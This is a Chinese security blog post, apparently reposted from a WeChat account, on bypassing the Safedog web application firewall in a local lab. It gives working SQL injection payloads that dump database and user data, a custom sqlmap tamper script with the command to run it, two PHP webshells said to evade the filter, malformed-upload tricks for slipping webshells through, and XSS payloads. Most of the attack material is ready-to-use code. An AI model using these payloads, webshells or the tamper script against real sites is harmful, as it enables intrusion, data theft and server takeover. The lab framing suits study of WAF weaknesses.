原创 | 安全狗绕waf、编写sqlmap tamper脚本

admin

102157
文章

87
评论

2020年10月20日18:00:50评论304 views字数 4559阅读15分11秒阅读模式

点击上方蓝字关注我吧

准备工作

安全狗官网：
http://free.safedog.cn/install_desc_website.html

环境：Windows7+phpstudy+sqli-labs+安全狗v4.0

安装的时候最后让填系统服务，cd到phpstudy的apache2/bin目录，cmd执行：

httpd.exe -k install -n apache

然后服务名填写apache就行了。去github下载sqli-labs，修改sqli-labs/sql-connections/db-creds.inc为自己环境的数据库用户名和密码，然后切换phpstudy的php版本为5.2(sqli-labs需要php版本<5.5)，修改php.ini：


magic_quotes_gpc = Off



准备工作完成



















绕SQL waf







1.注入判断
下面payload拦截：

-1'||1='1


下面payload不拦截：





-1'||-1='-1-1'/*!14400or*/1=1%23



=替换成>、<、like、regexp同样可以绕过
2.查询字段数
利用换行符+注释绕：





1'/**/order/*/%0a*a*/by/**/3%23







3.联合查询
同样利用换行符+注释绕，因为当union与select同时用的时候它才进行拦截：

-1'union/*/%0a*a*/select/**/1,2,3%23






4.查询所有数据库名：





-1'union/*/%0a*a*/select/**/1,2,(select/**/group_concat(schema_name)from/**/information_schema.schemata)%23


查询当前数据库的表名时用到了database()，直接用的话会被拦截，这里用内联注释符将函数特征打乱：





-1'union/*/%0a*a*/select/**/1,2,(select/**/group_concat(table_name)from/**/information_schema.tables/**/where/**/table_schema=DatabaSe/*!(*/))%23







查询users表的字段名：





-1'union/*/%0a*a*/select/**/1,2,(select/**/group_concat(column_name)from/**/information_schema.columns/**/where/**/table_name='users')%23



查数据：





-1'union/*/%0a*a*/select/**/1,2,(select/**/group_concat(username)from/**/users)%23











编写sqlmap tamper脚本







直接使用sqlmap，它可以识别出安全狗waf、以及可以通过布尔盲注的方法跑数据(需要--random-agent参数)：






使用sqlmap的--list-tampers选项查看sqlmap自带的tamper脚本：







这些tamper脚本位于sqlmap-master/tamper/下，以lowercase.py为例，分析tamper脚本如何编写：

#!/usr/bin/env python
"""Copyright (c) 2006-2020 sqlmap developers (http://sqlmap.org/)See the file 'LICENSE' for copying permission"""
import re # 用于正则匹配
from lib.core.data import kbfrom lib.core.enums import PRIORITY
__priority__ = PRIORITY.NORMAL # 定义优先级，此处是‘一般’
def dependencies():    pass
def tamper(payload, **kwargs): # 定义tamper脚本    # tamper说明    """    Replaces each keyword character with lower case value (e.g. SELECT -> select)
    Tested against:        * Microsoft SQL Server 2005        * MySQL 4, 5.0 and 5.5        * Oracle 10g        * PostgreSQL 8.3, 8.4, 9.0
    Notes:        * Useful to bypass very weak and bespoke web application firewalls          that has poorly written permissive regular expressions
    >>> tamper('INSERT')    'insert'    """
    retVal = payload # 将基本payload赋值给retVal，做中间转换
    if payload:        for match in re.finditer(r"b[A-Za-z_]+b", retVal): # 查找字母            word = match.group() # 将查找到的值赋值给word
            if word.upper() in kb.keywords: # 查找到的值是关键字                retVal = retVal.replace(word, word.lower()) # 将关键字全部替换为小写
    return retVal # 返回替换后的值




那么复制上面的一份，改名为safedog.py，更改tamper()函数，自己编写进行关键字的替换：





#!/usr/bin/env python
"""Copyright (c) 2006-2020 sqlmap developers (http://sqlmap.org/)See the file 'LICENSE' for copying permission"""
import re
from lib.core.data import kbfrom lib.core.enums import PRIORITY
__priority__ = PRIORITY.NORMAL
def dependencies():    pass
def tamper(payload, **kwargs):
    retVal = payload
    if payload:        retVal = retVal.replace('UNION', 'uNiOn/*/%0a*a*/')        retVal = retVal.replace('DATABASE()', 'dataBase/*!(*/)')        retVal = retVal.replace('USER()', 'usEr/*!(*/)')        retVal = retVal.replace(' ', '/**/')        retVal = retVal.replace('OR', '/*!14400Or*/')        retVal = retVal.replace('AND', '/*!14400aNd*/')
    return retVal


再次测试：





./sqlmap.py -u 'http://10.211.55.5/sqli-labs/Less-1/?id=1' --flush-session --tamper=safedog --random-agent   







这下便可以用sqlmap进行UNION注入了










绕WebShell waf 






普通一句话直接被拦截：




随便一个过D盾的马：





<?php$b = &$a;$a = $_POST[1];$c = &$b;eval(`/**test**/`.$c);?>







直接进行命令执行，也是能过狗的：






<?phpSystem(/**/"$_GET[1]");?>















绕文件上传waf







首先准备一个文件上传demo
upload.html：





<!doctype html><html lang="en"><head>    <meta charset="UTF-8">    <meta name="viewport"          content="width=device-width, user-scalable=no, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0">    <meta http-equiv="X-UA-Compatible" content="ie=edge">    <title>Document</title></head><body><form action="./upload.php" enctype="multipart/form-data"  multiple="" method="POST" >    < input type="file" name="img[]" multiple>    <button>提交</button></form></body></html>



upload.php:

<?phpecho '<pre>';$img = $_FILES['img'];if(!empty($img)){    $img_desc = reArrayFiles($img);    #print_r($img_desc);    foreach($img_desc as $val)    {        $newname = date('YmdHis',time()).mt_rand().'.'.$img["name"][0];        move_uploaded_file($val['tmp_name'],'C:phpstudy_proWWWupload\'.$newname);        echo $newname;    }}
function reArrayFiles($file){    $file_ary = array();    $file_count = count($file['name']);    $file_key = array_keys($file);
    for($i=0;$i<$file_count;$i++)    {        foreach($file_key as $val)        {            $file_ary[$i][$val] = $file[$val][$i];        }    }    return $file_ary;}?>




直接上传一个webshell，发现被拦截：







测试发现只对后缀名进行了检测；使用burp fuzz可用后缀：





由于是windows环境，服务器并不能将这些可用后缀当做php解析

绕过方法
主要利用畸形request包请求，apache处理request包的时候有容错，从而造成判断差异
1.通过filename处换行绕过：







2.filename用多=







3.用两个filename，第一个filename用=;





4.文件名处填充垃圾字符(大约8k)，这种情况需要后端更改上传的文件名，不然文件名太长move_uploaded_file会移动失败

5.利用.htaccess、.user.ini









绕XSS waf







以最简单的反射型xss为例，a.php写入：

<?php echo $_GET[1]; ?>








fuzz了一下，下面这些会触发waf：





<script> 标签<img 标签中含有 src=<iframe 标签中含有 src="javascript:


直接用svg标签：





<svg/onload=alert(1)>






使用带on属性的标签，鼠标滑过时触发：





<h1 onmousemove="alert(1)">a</h1>






























点分享





点点赞




点在看






本文始发于微信公众号（SecIN技术平台）：原创 | 安全狗绕waf、编写sqlmap tamper脚本